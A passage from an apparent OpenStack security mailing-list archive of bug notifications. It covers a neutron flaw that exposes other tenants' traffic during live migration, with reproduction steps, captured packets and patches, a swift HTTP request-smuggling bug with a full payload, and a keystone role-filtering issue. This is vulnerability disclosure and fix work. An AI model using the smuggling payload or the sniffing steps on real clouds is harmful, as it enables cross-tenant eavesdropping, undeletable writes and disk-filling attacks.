instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From 1840507 at bugs.launchpad.net Thu Oct 3 16:34:40 2019 From: 1840507 at bugs.launchpad.net (OpenStack Infra) Date: Thu, 03 Oct 2019 16:34:40 -0000 Subject: [Openstack-security] [Bug 1840507] Fix included in openstack/swift 2.23.0 References: <156599088351.26410.7391620144910796824.malonedeb@gac.canonical.com> Message-ID: <157012048028.21544.8801188511879418908.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/swift 2.23.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1840507 Title: Mixed py2/py3 environment allows authed users to write arbitrary data to the cluster Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Bug description: Python 3 doesn't parse headers the same way as python 2 [1]. We attempt to address this failing [2], but since we're doing it at the application level, eventlet can still get confused about what should and should not be the request body. Consider a client request like   PUT /v1/AUTH_test/c/o HTTP/1.1   Host: saio:8080   Content-Length: 4   Connection: close   X-Object-Meta-x-🌴: 👍   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Transfer-Encoding: chunked   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 A python 2 proxy-server will auth the user, add a bunch more headers, and send a request on to the object-servers like   PUT /sdb1/312/AUTH_test/c/o HTTP/1.1   Accept-Encoding: identity   Expect: 100-continue   X-Container-Device: sdb2   Content-Length: 4   X-Object-Meta-X-🌴: 👍   Connection: close   X-Auth-Token: AUTH_tk71fece73d6af458a847f82ef9623d46a   Content-Type: application/octet-stream   X-Backend-Storage-Policy-Index: 1   X-Timestamp: 1565985475.83685   X-Container-Host: 127.0.0.1:6021   X-Container-Partition: 61   Host: saio:8080   User-Agent: proxy-server 3752   Referer: PUT http://saio:8080/v1/AUTH_test/c/o   Transfer-Encoding: chunked   X-Trans-Id: txef407697a8c1416c9cf2d-005d570ac3   X-Backend-Clean-Expiring-Object-Queue: f (Note that the exact order of the headers will vary but is significant; the above was obtained on my machine with PYTHONHASHSEED=1.) On a python 3 object-server, eventlet will only have seen the headers up to (and not including, though that doesn't really matter) the palm tree. Significantly, it sees `Content-Length: 4` (which, per the spec [3], the proxy-server ignored) and doesn't see either of `Connection: close` or `Transfer-Encoding: chunked`. The *application* gets all of the headers, though, so it responds   HTTP/1.1 100 Continue and the proxy sends the body:   aa   PUT /sdb1/0/DUDE_u/r/pwned HTTP/1.1   Content-Length: 4   X-Timestamp: 9999999999.99999_ffffffffffffffff   Content-Type: text/evil   X-Backend-Storage-Policy-Index: 1   evil   0 Since eventlet thinks the request body is only four bytes, swift writes down b'aa\r\n' for AUTH_test/c/o. Since eventlet didn't see the `Connection: close` header, it looks for and processes more requests on the socket, and swift writes a second object:   $ swift-object-info /srv/node1/sdb1/objects-1/0/*/*/9999999999.99999_ffffffffffffffff.data   Path: /DUDE_u/r/pwned     Account: DUDE_u     Container: r     Object: pwned     Object hash: b05097e51f8700a3f5a29d93eb2941f2   Content-Type: text/evil   Timestamp: 2286-11-20T17:46:39.999990 (9999999999.99999_ffffffffffffffff)   System Metadata:     No metadata found   Transient System Metadata:     No metadata found   User Metadata:     No metadata found   Other Metadata:     No metadata found   ETag: 4034a346ccee15292d823416f7510a2f (valid)   Content-Length: 4 (valid)   Partition 705   Hash b05097e51f8700a3f5a29d93eb2941f2   ... There are a few things worth noting at this point: 1. This was for a replicated policy with encryption not enabled.    Having encryption enabled would mitigate this as the attack    payload would be encrypted; using an erasure-coded policy would    complicate the attack, but I believe most EC schemes would still    be vulnerable. 2. An attacker would need to know (or be able to guess) a device    name (such as "sdb1" above) used by one of the backend nodes. 3. Swift doesn't know how to delete this data -- the X-Timestamp    used was the maximum valid value, so no tombstone can be    written over it [4]. 4. The account and container may not actually exist; it doesn't    really matter as no container update is sent. As a result, the    data written cannot easily be found or tracked. 5. A small payload was used for the demonstration, but it should    be fairly trivial to craft a larger one; this has potential as    a DOS attack on a cluster by filling its disks. The fix should involve at least things: First, after re-parsing headers, servers should make appropriate adjustments to environ['wsgi.input'] to ensure that it has all relevant information about the request body. Second, the proxy should not include a Content-Length header when sending a chunk-encoded request to the backend. [1] https://bugs.python.org/issue37093 [2] https://github.com/openstack/swift/commit/76fde8926 [3] https://tools.ietf.org/html/rfc7230#section-3.3.3 item 3 [4] https://github.com/openstack/swift/commit/f581fccf7 To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1840507/+subscriptions From 1734320 at bugs.launchpad.net Fri Oct 4 15:39:54 2019 From: 1734320 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 04 Oct 2019 15:39:54 -0000 Subject: [Openstack-security] [Bug 1734320] Re: Eavesdropping private traffic References: <151152217834.14483.1577991310209811902.malonedeb@soybean.canonical.com> Message-ID: <157020359515.16003.145843992420879501.malone@soybean.canonical.com> Reviewed: https://review.opendev.org/686345 Committed: https://git.openstack.org/cgit/openstack/neutron/commit/?id=ffee956d44da34e38e62f82a3bc676cdd6179f48 Submitter: Zuul Branch: stable/rocky commit ffee956d44da34e38e62f82a3bc676cdd6179f48 Author: Sean Mooney Date: Thu Nov 8 16:07:55 2018 +0000 raise priority of dead vlan drop - This change adds a max priority flow to drop all traffic that is associated with the DEAD VLAN 4095. - This change is part of a partial mitigation of bug 1734320. Without this change vlan 4095 traffic will be dropped via a low priority flow after being processed by part/all of the openflow pipeline. By raising the priorty and droping in table 0 we drop invalid packets as soon as they enter the pipeline. Change-Id: I3482c7c4f00942828cc9396cd2f3d646c9e8c9d1 Partial-Bug: #1734320 (cherry picked from commit e3dc447b908f57e9acc0378111b8e09cbd88ddc5) ** Tags added: in-stable-rocky -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1734320 Title: Eavesdropping private traffic Status in neutron: Fix Committed Status in OpenStack Compute (nova): In Progress Status in os-vif: Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Eavesdropping private traffic ============================= Abstract -------- We've discovered a security issue that allows end users within their own private network to receive from, and send traffic to, other private networks on the same compute node. Description ----------- During live-migration there is a small time window where the ports of instances are untagged. Instances have a port trunked to the integration bridge and receive 802.1Q tagged private traffic from other tenants. If the port is administratively down during live migration, the port will remain in trunk mode indefinitely. Traffic is possible between ports is that are administratively down, even between tenants self-service networks. Conditions ---------- The following conditions are necessary. * Openvswitch Self-service networks * An Openstack administrator or an automated process needs to schedule a Live migration We tested this on newton. Issues ------ This outcome is the result of multiple independent issues. We will list the most important first, and follow with bugs that create a fragile situation. Issue #1 Initially creating a trunk port When the port is initially created, it is in trunk mode. This creates a fail-open situation. See: https://github.com/openstack/os-vif/blob/newton-eol/vif_plug_ovs/linux_net.py#L52 Recommendation: create ports in the port_dead state, don't leave it dangling in trunk-mode. Add a drop-flow initially. Issue #2 Order of creation. The instance is actually migrated before the (networking) configuration is completed. Recommendation: wait with finishing the live migration until the underlying configuration has been applied completely. Issue #3 Not closing the port when it is down. Neutron calls the port_dead function to ensure the port is down. It sets the tag to 4095 and adds a "drop" flow if (and only if) there is already another tag on the port. The port_dead function will keep untagged ports untagged. https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995 Recommendation: Make port_dead also shut the port if no tag is found. Log a warning if this happens. Issue #4 Putting the port administratively down actually puts the port on a compute node shared vlan Instances from different projects on different private networks can talk to each other if they put their ports down. The code does install an openflow "drop" rule but it has a lower priority (2) than the allow rules. Recommendation: Increase the port_dead openflow drop rule priority to MAX Timeline --------  2017-09-14 Discovery eavesdropping issue  2017-09-15 Verify workaround.  2017-10-04 Discovery port-down-traffic issue  2017-11-24 Vendor Disclosure to Openstack Steps to reproduce ------------------ 1. Attach an instance to two networks: admin$ openstack server create --nic net-id= --nic net-id = --image --flavor instance_temp 2. Attach a FIP to the instance to be able to log in to this instance 3. Verify: admin$ openstack server show -c name -c addresses fe28a2ee-098f-4425 -9d3c-8e2cd383547d +-----------+-----------------------------------------------------------------------------+ | Field | Value | +-----------+-----------------------------------------------------------------------------+ | addresses | network1=192.168.99.8, ; network2=192.168.80.14 | | name | instance_temp | +-----------+-----------------------------------------------------------------------------+ 4. Ssh to the instance using network1 and run a tcpdump on the other port network2 [root at instance_temp]$ tcpdump -eeenni eth1 5. Get port-id of network2 admin$ nova interface-list fe28a2ee-098f-4425-9d3c-8e2cd383547d +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | Port State | Port ID | Net ID | IP addresses | MAC Addr | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ | ACTIVE | a848520b-0814-4030-bb48-49e4b5cf8160 | d69028f7-9558-4f14-8ce6-29cb8f1c19cd | 192.168.80.14 | fa:16:3e:2d:8b:7b | | ACTIVE | fad148ca-cf7a-4839-aac3-a2cd8d1d2260 | d22c22ae-0a42-4e3b-8144-f28534c3439a | 192.168.99.8 | fa:16:3e:60:2c:fa | +------------+--------------------------------------+--------------------------------------+---------------+-------------------+ 6. Force port down on network 2 admin$ neutron port-update a848520b-0814-4030-bb48-49e4b5cf8160 --admin-state-up False 7. Port gets tagged with vlan 4095, the dead vlan tag, which is normal: compute1# grep a848520b-0814-4030-bb48-49e4b5cf8160 /var/log/neutron/neutron-openvswitch-agent.log | tail -1 INFO neutron.plugins.ml2.drivers.openvswitch.agent.ovs_neutron_agent [req-e008feb3-8a35-4c97-adac-b48ff88165b2 - - - - -] VIF port: a848520b-0814-4030-bb48-49e4b5cf8160 admin state up disabled, putting on the dead VLAN 8. Verify the port is tagged with vlan 4095 compute1# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           tag: 4095           Interface "qvoa848520b-08" 9. Now live-migrate the instance: admin# nova live-migration fe28a2ee-098f-4425-9d3c-8e2cd383547d 10. Verify the tag is gone on compute2, and take a deep breath compute2# ovs-vsctl show | grep -A3 qvoa848520b-08       Port "qvoa848520b-08"           Interface "qvoa848520b-08"       Port... compute2# echo "Wut!" 11. Now traffic of all other self-service networks present on compute2 can be sniffed from instance_temp [root at instance_temp] tcpdump -eenni eth1 13:14:31.748266 fa:16:3e:6a:17:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.152, length 28 13:14:31.804573 fa:16:3e:e8:a2:d2 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.70, length 28 13:14:31.810482 fa:16:3e:95:ca:3a > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.154, length 28 13:14:31.977820 fa:16:3e:6f:f4:9b > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.150, length 28 13:14:31.979590 fa:16:3e:0f:3d:cc > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 9, p 0, ethertype ARP, Request who-has 10.103.9.163 tell 10.103.9.1, length 28 13:14:32.048082 fa:16:3e:65:64:38 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.101, length 28 13:14:32.127400 fa:16:3e:30:cb:b5 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.165, length 28 13:14:32.141982 fa:16:3e:96:cd:b0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.100, length 28 13:14:32.205327 fa:16:3e:a2:0b:76 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.153, length 28 13:14:32.444142 fa:16:3e:1f:db:ed > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 72, p 0, ethertype IPv4, 192.168.99.212 > 224.0.0.18: VRRPv2, Advertisement, vrid 50, prio 103, authtype none, intvl 1s, length 20 13:14:32.449497 fa:16:3e:1c:24:c0 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.20, length 28 13:14:32.476015 fa:16:3e:f2:3b:97 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 33, p 0, ethertype ARP, Request who-has 10.0.1.9 tell 10.0.1.22, length 28 13:14:32.575034 fa:16:3e:44:fe:35 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.163, length 28 13:14:32.676185 fa:16:3e:1e:92:d7 > ff:ff:ff:ff:ff:ff, ethertype 802.1Q (0x8100), length 46: vlan 10, p 0, ethertype ARP, Request who-has 10.103.12.160 tell 10.103.12.150, length 28 13:14:32.711755 fa:16:3e:99:6c:c8 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 62: vlan 10, p 0, ethertype IPv4, 10.103.12.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 2, prio 49, authtype simple, intvl 1s, length 24 13:14:32.711773 fa:16:3e:f5:23:d5 > 01:00:5e:00:00:12, ethertype 802.1Q (0x8100), length 58: vlan 12, p 0, ethertype IPv4, 10.103.15.154 > 224.0.0.18: VRRPv2, Advertisement, vrid 1, prio 49, authtype simple, intvl 1s, length 20 Workaround ---------- We temporary fixed this issue by forcing the dead vlan tag on port creation on compute nodes: /usr/lib/python2.7/site-packages/vif_plug_ovs/linux_net.py: def _create_ovs_vif_cmd(bridge, dev, iface_id, mac,                         instance_id, interface_type=None,                         vhost_server_path=None): + # ODCN: initialize port as dead + # ODCN: TODO: set drop flow     cmd = ['--', '--if-exists', 'del-port', dev, '--',             'add-port', bridge, dev, + 'tag=4095',             '--', 'set', 'Interface', dev,             'external-ids:iface-id=%s' % iface_id,             'external-ids:iface-status=active',             'external-ids:attached-mac=%s' % mac,             'external-ids:vm-uuid=%s' % instance_id]     if interface_type:         cmd += ['type=%s' % interface_type]     if vhost_server_path:         cmd += ['options:vhost-server-path=%s' % vhost_server_path]     return cmd https://github.com/openstack/neutron/blob/stable/newton/neutron/plugins/ml2/drivers/openvswitch/agent/ovs_neutron_agent.py#L995     def port_dead(self, port, log_errors=True):         '''Once a port has no binding, put it on the "dead vlan".         :param port: an ovs_lib.VifPort object.         '''         # Don't kill a port if it's already dead         cur_tag = self.int_br.db_get_val("Port", port.port_name, "tag",                                          log_errors=log_errors) + # ODCN GM 20170915 + if not cur_tag: + LOG.error('port_dead(): port %s has no tag', port.port_name) + # ODCN AJS 20170915 + if not cur_tag or cur_tag != constants.DEAD_VLAN_TAG: - if cur_tag and cur_tag != constants.DEAD_VLAN_TAG:            LOG.info('port_dead(): put port %s on dead vlan', port.port_name)            self.int_br.set_db_attribute("Port", port.port_name, "tag",                                          constants.DEAD_VLAN_TAG,                                          log_errors=log_errors)             self.int_br.drop_port(in_port=port.ofport) plugins/ml2/drivers/openvswitch/agent/openflow/ovs_ofctl/ovs_bridge.py     def drop_port(self, in_port): + # ODCN AJS 20171004: - self.install_drop(priority=2, in_port=in_port) + self.install_drop(priority=65535, in_port=in_port) Regards, ODC Noord. Gerhard Muntingh Albert Siersema Paul Peereboom To manage notifications about this bug go to: https://bugs.launchpad.net/neutron/+bug/1734320/+subscriptions From fungi at yuggoth.org Fri Oct 4 20:03:40 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 04 Oct 2019 20:03:40 -0000 Subject: [Openstack-security] [Bug 1846817] Re: v3/role_assignments filtering exposes unnecessary role assignments References: <157021550823.969.5501239713217750813.malonedeb@chaenomeles.canonical.com> Message-ID: <157021942244.15801.2279434195649641679.launchpad@soybean.canonical.com> ** Changed in: ossa Status: Incomplete => Won't Fix ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply "member" (it's the other way around). $ openstack role assignment list --names --system all --debug START with options: role assignment list --names --system all --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='', auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domain_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=False, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='', passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_project_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', username='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 